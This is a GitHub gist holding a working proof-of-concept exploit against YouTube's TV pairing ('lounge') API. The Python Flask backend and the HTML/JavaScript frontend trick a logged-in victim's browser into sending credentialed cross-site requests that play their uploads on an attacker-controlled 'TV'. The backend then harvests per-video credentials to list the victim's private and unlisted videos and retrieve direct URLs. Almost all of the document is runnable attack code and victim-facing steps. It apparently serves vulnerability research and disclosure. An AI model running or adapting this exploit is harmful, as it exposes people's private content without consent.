Last active
June 5, 2024 06:38
-
-
Save xdavidhu/b264ee21d8586e580adc7f821ddfbfc9 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# POC Flow:
# 1. Request the victim/frontend to play all of his/her videos
#    on the malicious "TV", and find out what videos are private.
#
# 2. Iterate over all of the victim's private videos,
#    and request the victim/frontend to play all of
#    them one by one. When the victim plays one, the
#    malicious "TV" gets a credential for it.
import requests | |
import re | |
from flask import Flask, request, abort | |
import json | |
import threading | |
import logging | |
import time | |
from urllib.parse import unquote | |
import os | |
# Enter an API key with YouTube Data API enabled
YT_DATA_API_KEY = ""

# The host to bind the POC webserver to
host_to_bind_to = "127.0.0.1"

# Endpoints used by the script later.
# Extracted from requests made by the YouTube/YT TV JS,
# so some parameters have some seemingly "random" values.
# Bracketed names such as [token] are placeholders that the
# functions below fill in with str.replace().
API_VIDEOS = (
    "https://www.googleapis.com/youtube/v3/videos"
    "?part=snippet%2C%20status"
    "&id=[video_ids]"
    "&key=[api_key]"
)
YT_SCREEN_ID = "https://www.youtube.com/api/lounge/pairing/generate_screen_id"
YT_TOKEN = "https://www.youtube.com/api/lounge/pairing/get_lounge_token_batch"
YT_BIND_INIT = (
    "https://www.youtube.com/api/lounge/bc/bind"
    "?device=LOUNGE_SCREEN"
    "&id=8700c39e-eec8-4923-8d84-41dcd5d0435f"
    "&name=YouTube%20on%20TV"
    "&app=lb-v4"
    "&theme=cl"
    "&capabilities=dsp"
    "&mdxVersion=2"
    "&loungeIdToken=[token]"
    "&VER=8"
    "&v=2"
    "&RID=580"
    "&CVER=1"
    "&zx=lmxe5k2biyyg"
    "&t=1"
)
YT_BIND = (
    "https://www.youtube.com/api/lounge/bc/bind"
    "?device=LOUNGE_SCREEN"
    "&id=8700c39e-eec8-4923-8d84-41dcd5d0435f"
    "&name=YouTube%20on%20TV"
    "&app=lb-v4"
    "&theme=cl"
    "&capabilities=dsp"
    "&mdxVersion=2"
    "&loungeIdToken=[token]"
    "&VER=8"
    "&v=2"
    "&RID=rpc"
    "&SID=[sid]"
    "&CI=1"
    "&AID=3"
    "&gsessionid=[gsid]"
    "&TYPE=xmlhttp"
    "&zx=2icgcq6qwpat"
    "&t=1"
)
YT_GET_VIDEO_INFO = (
    "https://www.youtube.com/get_video_info"
    "?html5=1"
    "&video_id=[video_id]"
    "&c=TVHTML5"
    "&vvt=[ctt]"
)

# Regexes used to grep for specific strings in the responses.
# Each one is a lookbehind/lookahead pair, so the match is only the
# value between the surrounding quotes.
INIT_SID_REGEX = r"(?<=\[\"c\",\").+?(?=\")"
INIT_GSID_REGEX = r"(?<=\[\"S\",\").+?(?=\")"
VIDEOIDS_REGEX = r"(?<=\"videoIds\":\").+?(?=\")"
CTT_REGEX = r"(?<=\"ctt\":\").+?(?=\")"
# This pattern expects the quotes to be backslash-escaped in the text.
VIDEOID_REGEX = r"(?<=\\\"videoId\\\":\\\").+?(?=\\\")"
PRIVATE_URL_REGEX = r"(?<=\"url\":\").+?(?=\")"
PRIVATE_TITLE_REGEX = r"(?<=\"title\":\").+?(?=\")"
# Shared state used by the Flask server.
# The main flow writes these names and the Flask handlers read them.
# A `global` statement at module level has no effect, so every name is
# simply bound here; the ones that have no value yet start out as None
# and are only read by the handlers once the matching "ready" flag is True.
lounge_token = None
lounge_token_ready = False
current_private_video_request_id = 0
current_private_video_request_video_id = None
private_video_request_ready = False
private_video_request_done = False
victim_uploads_pl = None
# Flask server / endpoints
app = Flask(__name__)

# Disable the 'werkzeug' logger so that only this script's own
# print() output shows up in the console.
log = logging.getLogger("werkzeug")
log.disabled = True
# Check the 'Host' header to protect against
# DNS rebinding attacks
@app.before_request
def before_request_callback():
    """Abort with 403 unless the Host header is the bind host on port 8090."""
    expected_host = host_to_bind_to + ":8090"
    if request.headers.get("host") != expected_host:
        abort(403)
# Serves the 'frontend.html' to the victim
@app.route("/")
def get_frontend():
    """Return the contents of 'frontend.html' as the response body.

    The path is relative, so the file is looked up in the current working
    directory. It is read as UTF-8 explicitly so the result does not depend
    on the platform's default text encoding.
    """
    with open("frontend.html", "r", encoding="utf-8") as file:
        return file.read()
# Returns the initial configuration for the victim,
# which consists of the 'lounge_token' and the
# victim's 'uploads' playlist ID
@app.route('/get_lounge_token')
def get_lounge_token():
    """Return the lounge token and uploads playlist ID once they are ready.

    Returns:
        The string 'not-ready' while `lounge_token_ready` is false, otherwise
        a JSON array `[lounge_token, victim_uploads_pl]`.
    """
    if not lounge_token_ready:
        return 'not-ready'
    return json.dumps([lounge_token, victim_uploads_pl])
# Returns the current 'private video request' to the frontend.
# The frontend is polling this endpoint, and when one
# private video is processed, the backend updates the
# content to point to the next private video.
@app.route('/get_current_private_video')
def get_current_private_video():
    """Return the private video the frontend should play next.

    Returns:
        'not-ready' until the first request has been prepared, 'done' once
        `private_video_request_done` is set, otherwise a JSON object with
        the keys "id", "lounge_token" and "video_id".
    """
    if not private_video_request_ready:
        return 'not-ready'
    if private_video_request_done:
        return 'done'
    return json.dumps({
        "id": current_private_video_request_id,
        "lounge_token": lounge_token,
        "video_id": current_private_video_request_video_id
    })
# end_flask | |
# Generates a 'screen_id'
def get_screen_id():
    """Request a new screen ID from the `YT_SCREEN_ID` endpoint.

    Returns:
        The response body as text.

    Raises:
        requests.RequestException: if the request times out or the server
            answers with an HTTP error status.
    """
    print("[+] Getting screen_id...")
    # Without a timeout, requests waits indefinitely for a response.
    r = requests.get(YT_SCREEN_ID, timeout=30)
    # Fail here instead of returning an error page as the screen ID.
    r.raise_for_status()
    return r.text
# Requests a 'loungeToken' with a 'screen_id'
def get_token(screen_id):
    """Exchange a screen ID for a lounge token.

    Args:
        screen_id: Screen ID sent as the 'screen_ids' form field.

    Returns:
        The 'loungeToken' of the first entry in the response's 'screens' list.

    Raises:
        requests.RequestException: if the request times out or the server
            answers with an HTTP error status.
    """
    print("[+] Getting token for screen_id...")
    # Without a timeout, requests waits indefinitely for a response.
    r = requests.post(YT_TOKEN, data={"screen_ids": screen_id}, timeout=30)
    r.raise_for_status()
    return r.json()["screens"][0]["loungeToken"]
# Gets the credentials required for the 'bind' endpoint
def init_bind(lounge_token):
    """Open a bind session and extract its session identifiers.

    Args:
        lounge_token: Token substituted for '[token]' in `YT_BIND_INIT`.

    Returns:
        A `(sid, gsid)` tuple: the first matches of `INIT_SID_REGEX` and
        `INIT_GSID_REGEX` in the response body.

    Raises:
        requests.RequestException: if the request times out or the server
            answers with an HTTP error status.
        RuntimeError: if either identifier is missing from the response.
    """
    print("[+] Getting the credentials for polling...")
    r = requests.post(YT_BIND_INIT.replace("[token]", lounge_token), timeout=30)
    r.raise_for_status()
    sid_match = re.search(INIT_SID_REGEX, r.text)
    gsid_match = re.search(INIT_GSID_REGEX, r.text)
    # Report a missing identifier explicitly rather than via an IndexError.
    if sid_match is None or gsid_match is None:
        raise RuntimeError("bind init response did not contain SID/gsessionid")
    return sid_match.group(0), gsid_match.group(0)
# Starts polling the 'bind' endpoint.
# Waits for the frontend to "play" the victim's
# 'uploads' playlist.
def bind(lounge_token, sid, gsid):
    """Poll the bind endpoint until a response carries a video ID list.

    Args:
        lounge_token: Value substituted for '[token]' in `YT_BIND`.
        sid: Value substituted for '[sid]'.
        gsid: Value substituted for '[gsid]'.

    Returns:
        The list of video IDs (the first `VIDEOIDS_REGEX` match split on
        commas), or an empty list when the response contains an empty
        'videoIds' array.
    """
    print("[+] Starting to poll leanback bind endpoint...")
    # The URL is the same for every poll, so build it once.
    poll_url = (
        YT_BIND.replace("[token]", lounge_token)
        .replace("[sid]", sid)
        .replace("[gsid]", gsid)
    )
    while True:
        body = requests.get(poll_url).text
        if "\\\"videoIds\\\":[]" in body:
            print("[!] Victim has no videos!")
            return []
        matches = re.findall(VIDEOIDS_REGEX, body)
        if not matches:
            # Nothing relevant in this response; poll again.
            continue
        found_ids = matches[0].split(",")
        print("[+] Victim connected! Videos: " + str(len(found_ids)))
        return found_ids
# Queries the YouTube Data API to find out the
# privacy status of the provided list of videos.
def process_videos(video_ids):
    """Classify the given videos as public, unlisted or private.

    Videos the API reports with privacyStatus "unlisted" are unlisted, every
    other video it returns is counted as public, and every requested ID that
    the API does not return at all is treated as private.

    Args:
        video_ids: List of video ID strings. May be empty, in which case no
            API request is made.

    Returns:
        A tuple `(unlisted_videos, private_video_ids)`, where
        `unlisted_videos` is a list of `[id, title]` pairs and
        `private_video_ids` is a list of IDs in the order they were given.

    Raises:
        requests.RequestException: if a request times out or the API answers
            with an HTTP error status.
    """
    unlisted_videos = []
    # Sets give constant-time membership checks when sorting out private IDs.
    unlisted_video_ids = set()
    public_video_ids = set()
    print("[+] Querying YouTube Data API to find which videos are private/unlisted...")
    base_url = API_VIDEOS.replace("[api_key]", YT_DATA_API_KEY)
    # Query in batches instead of putting every ID into one URL.
    # NOTE(review): 50 is the commonly cited per-request ID limit of
    # videos.list - confirm against the API documentation.
    batch_size = 50
    for start in range(0, len(video_ids), batch_size):
        batch = video_ids[start:start + batch_size]
        r = requests.get(base_url.replace("[video_ids]", ",".join(batch)), timeout=30)
        # Surface API errors (bad key, quota, ...) with their HTTP status
        # instead of a KeyError on the missing "items" key.
        r.raise_for_status()
        for item in r.json()["items"]:
            if item["status"]["privacyStatus"] == "unlisted":
                unlisted_video_ids.add(item["id"])
                unlisted_videos.append([item["id"], item["snippet"]["title"]])
            else:
                public_video_ids.add(item["id"])
    private_video_ids = [
        video_id
        for video_id in video_ids
        if video_id not in public_video_ids and video_id not in unlisted_video_ids
    ]
    print("\n[+] Victim has:")
    print(" " + str(len(public_video_ids)) + " public videos")
    print(" " + str(len(unlisted_video_ids)) + " unlisted videos")
    print(" " + str(len(private_video_ids)) + " private videos")
    return unlisted_videos, private_video_ids
# Starts polling the 'bind' endpoint.
# Waits for the frontend to "play" one of the
# victim's private videos.
def bind_private(lounge_token, sid, gsid, video_id):
    """Poll the bind endpoint until a 'ctt' for `video_id` shows up.

    Args:
        lounge_token: Value substituted for '[token]' in `YT_BIND`.
        sid: Value substituted for '[sid]'.
        gsid: Value substituted for '[gsid]'.
        video_id: ID that the first `VIDEOID_REGEX` match must equal.

    Returns:
        The first `CTT_REGEX` match from the first response whose first
        video ID match equals `video_id`.
    """
    print("[+] Starting to poll leanback bind endpoint for private video '" + video_id + "'...")
    # The URL is the same for every poll, so build it once.
    poll_url = (
        YT_BIND.replace("[token]", lounge_token)
        .replace("[sid]", sid)
        .replace("[gsid]", gsid)
    )
    while True:
        body = requests.get(poll_url).text
        ctt_matches = re.findall(CTT_REGEX, body)
        id_matches = re.findall(VIDEOID_REGEX, body)
        if ctt_matches and id_matches and id_matches[0] == video_id:
            return ctt_matches[0]
# Queries the 'get_video_info' endpoint with the
# credentials from the victim to get one private video's
# raw video url and title.
def get_private_video_info(video_id, ctt):
    """Fetch the URL and title of one video using a 'ctt' credential.

    Args:
        video_id: Value substituted for '[video_id]' in `YT_GET_VIDEO_INFO`.
        ctt: Value substituted for '[ctt]'.

    Returns:
        A `(url, title)` tuple: the first matches of `PRIVATE_URL_REGEX` and
        `PRIVATE_TITLE_REGEX` in the decoded response.

    Raises:
        IndexError: if either pattern has no match in the response.
    """
    print("[+] Requesting 'get_video_info' with ctt for '" + video_id + "'...")
    info_url = YT_GET_VIDEO_INFO.replace("[video_id]", video_id).replace("[ctt]", ctt)
    client_headers = {
        "X-YouTube-Client-Name": "TVHTML5",
        "X-YouTube-Client-Version": "6.20180913",
    }
    r = requests.get(info_url, headers=client_headers)
    # Percent-decode the body and turn escaped ampersands back into '&'.
    decoded = unquote(r.text).replace("\\u0026", "&")
    return (
        re.findall(PRIVATE_URL_REGEX, decoded)[0],
        re.findall(PRIVATE_TITLE_REGEX, decoded)[0],
    )
# Start of the main POC flow
# Start the flask server.
print("[+] Starting Flask in a background thread...")
# The server runs as a daemon thread so that it cannot keep the process
# alive on its own if the main flow below stops with an exception.
flask_thread = threading.Thread(
    target=app.run,
    kwargs={"host": host_to_bind_to, "port": 8090, "use_reloader": False},
    daemon=True,
)
flask_thread.start()
# Give the server a moment to start before printing the URL.
time.sleep(1)
print("\n[+] Server is running. Send 'http://" + host_to_bind_to + ":8090' to vitim.\n")
# Request the victim's channel ID from the user.
# Surrounding whitespace is stripped, and the prompt is repeated until the
# input is long enough to have a second character to replace.
channel_id = input("[?] Enter the victim's channel ID: ").strip()
while len(channel_id) < 2:
    print("[!] The channel ID must be at least two characters long.")
    channel_id = input("[?] Enter the victim's channel ID: ").strip()
# Convert the channel ID to the victim's 'uploads' playlist ID
# by replacing its second character with 'U'.
victim_uploads_pl = channel_id[0] + "U" + channel_id[2:]
print("[+] Victim's 'uploads' playlist ID: " + victim_uploads_pl)
print("[*] 'uploads' playlist's ID is just the channel id, but the second char 'C' -> 'U'")
print("[*] '" + channel_id + "' -> '" + victim_uploads_pl + "'\n")
# Step 1 - Requesting the victim to "play" his/her
# 'uploads' playlist.
screen_id = get_screen_id()
lounge_token = get_token(screen_id)
sid, gsid = init_bind(lounge_token)
# From here on the '/get_lounge_token' endpoint hands out the token.
lounge_token_ready = True
video_ids = bind(lounge_token, sid, gsid)

# Process these videos and find out which one is private/unlisted.
unlisted_videos, private_video_ids = process_videos(video_ids)

# Print the victim's unlisted videos.
print("\n[+] Victim's unlisted videos:")
for unlisted_id, unlisted_title in unlisted_videos:
    print(f"\n ID: {unlisted_id}")
    print(f" Title: {unlisted_title}")
    print(f" YouTube URL: https://youtu.be/{unlisted_id}")
print("")
# Step 2 - Iterate over all private videos of the victim,
# and request the frontend to "play" all of them one by one.
# The Flask handlers read the globals assigned below, so the order of
# the assignments is kept exactly as it was.
print("[+] Getting the vitim's private videos...")
private_videos = []
for video_id in private_video_ids:
    current_private_video_request_video_id = video_id

    # Create fresh credentials for each video.
    # This could be done better, but getting the
    # bind endpoint to work with only one request was
    # quite complex already.
    screen_id = get_screen_id()
    lounge_token = get_token(screen_id)
    sid, gsid = init_bind(lounge_token)

    # Let the poll endpoint start serving requests (a no-op after the
    # first iteration, since the flag is already True).
    private_video_request_ready = True

    # Increment the 'request ID' by one to keep the
    # frontend & backend in sync.
    current_private_video_request_id += 1
    print(f"[{current_private_video_request_id}/{len(private_video_ids)}] Requesting frontend to play '{video_id}'...")

    ctt = bind_private(lounge_token, sid, gsid, video_id)
    print(f"[+] Got CTT '{ctt}' for video '{video_id}'!")
    url, title = get_private_video_info(video_id, ctt)
    private_videos.append([video_id, ctt, title, url])

# If the victim has no private videos the flag is still False here;
# set it so that the poll endpoint can answer 'done' and the frontend
# stops polling.
private_video_request_ready = True
private_video_request_done = True
# Print the victim's private videos.
# Each entry is [video_id, ctt, title, url]; the ctt is not printed.
print("\n[+] Victim's private videos:")
for private_id, _ctt, private_title, direct_url in private_videos:
    print(f"\n ID: {private_id}")
    # The title has '+' in place of spaces; put the spaces back.
    readable_title = private_title.replace("+", " ")
    print(f" Title: {readable_title}")
    print(f" YouTube URL: https://youtu.be/{private_id}")
    print(f" Direct video URL: {direct_url}")
print("")
print("[+] Done")

# Wait for frontend to receive the 'done' command from
# the poll endpoint.
time.sleep(2)

# Exit ugly, because I couldn't figure out how to
# stop Flask in the other thread...
os._exit(0)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<h4 id="log"></h4> | |
<script> | |
// Append one message, followed by a line break, to the "log" element.
function log(message) {
  const logElement = document.getElementById("log")
  logElement.innerHTML += "\n " + message + "<br>"
}
// Return a promise that resolves after `ms` milliseconds.
function sleep(ms) {
  return new Promise(function (wake) {
    setTimeout(wake, ms)
  })
}
// Send the CSRF request to play a new video/playlist on the malicious "TV".
//   loungeToken - value of the 'loungeIdToken' query parameter
//   id          - the video or playlist ID to play
//   idType      - key under which `id` is sent in 'params' (the callers
//                 use "listId" and "videoId")
// The returned promise always resolves: with the response on load, and
// with undefined on error.
function send_command(loungeToken, id, idType) {
  return new Promise(function (resolve, reject) {
    var xhr = new XMLHttpRequest()
    // The '&params=' separator had been mangled into '¶ms=' (the '&para'
    // HTML entity), which corrupted the query string; restored here.
    xhr.open("post", "https://www.youtube.com/api/lounge/bc/bind?device=REMOTE_CONTROL&id=&name=Desktop&app=youtube-desktop&mdxVersion=3&VER=8&v=2&ui=1&method=setPlaylist&params={\"" + idType + "\":\"" + id + "\",\"currentIndex\":0}&loungeIdToken=" + loungeToken, true)
    xhr.onload = function () {
      resolve(xhr.response)
    };
    // Errors are deliberately not treated as failures.
    xhr.onerror = function () {
      resolve()
    }
    xhr.withCredentials = true;
    xhr.send("count=0")
  });
}
// Send a GET request.
// Used to query the backend.
// Resolves with the response on load and rejects with an Error when the
// request fails, so that callers are not left waiting forever.
function get(url) {
  return new Promise(function (resolve, reject) {
    var xhr = new XMLHttpRequest()
    xhr.open("get", url, true)
    xhr.onload = function () {
      resolve(xhr.response)
    };
    xhr.onerror = function () {
      reject(new Error("GET " + url + " failed"))
    };
    xhr.send()
  });
}
// Drive both steps of the flow: fetch the initial configuration from the
// backend, trigger playback of the uploads playlist, then play every
// private video the backend asks for until it answers "done".
async function main() {
  log("[+] Page loaded")

  // Start of "Step 1"
  // Poll the backend for the 'loungeToken' and for which playlist to play.
  log("[+] Polling backend for loungeTokenResponse...")
  var loungeTokenResponse = "not-ready"
  while (loungeTokenResponse == "not-ready") {
    loungeTokenResponse = await get(window.location.href + "get_lounge_token")
    await sleep(200)
  }
  log("[+] Got loungeTokenResponse: " + loungeTokenResponse)
  loungeTokenResponse = JSON.parse(loungeTokenResponse)

  // Play the playlist requested by the backend.
  log("[+] Triggering malicious \"TV\" to play all uploads of victim...")
  await send_command(loungeTokenResponse[0], loungeTokenResponse[1], "listId")

  // Start of "Step 2"
  // Poll the backend to find out which private video to play.
  log("[+] Polling backend for private video requests...")
  var previous_id = 0
  while (true) {
    // Declared locally so it does not become an implicit global.
    var private_video_request = await get(window.location.href + "get_current_private_video")
    if (private_video_request == "done") {
      break
    }
    if (private_video_request != "not-ready") {
      private_video_request = JSON.parse(private_video_request)
      // The ID has to be bigger than the last request.
      // This way the backend & frontend can stay in sync
      // to not play the same video multiple times.
      if (private_video_request["id"] > previous_id) {
        log("[+] Backend requested to play the private video: " + private_video_request["video_id"])
        // Play the current private video on the malicious "TV".
        log("[+] Playling private video '" + private_video_request["video_id"] + "' on malicious \"TV\"...")
        await send_command(private_video_request["lounge_token"], private_video_request["video_id"], "videoId")
        // Remember the backend's own id rather than counting locally,
        // so the two sides cannot drift apart.
        previous_id = private_video_request["id"]
      }
    }
    // Wait between polls in every case, including "not-ready".
    await sleep(200)
  }
  log("[+] Done")
}
// Show a failure on the page instead of leaving an unhandled rejection.
main().catch(function (err) {
  log("[!] " + err)
})
</script> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment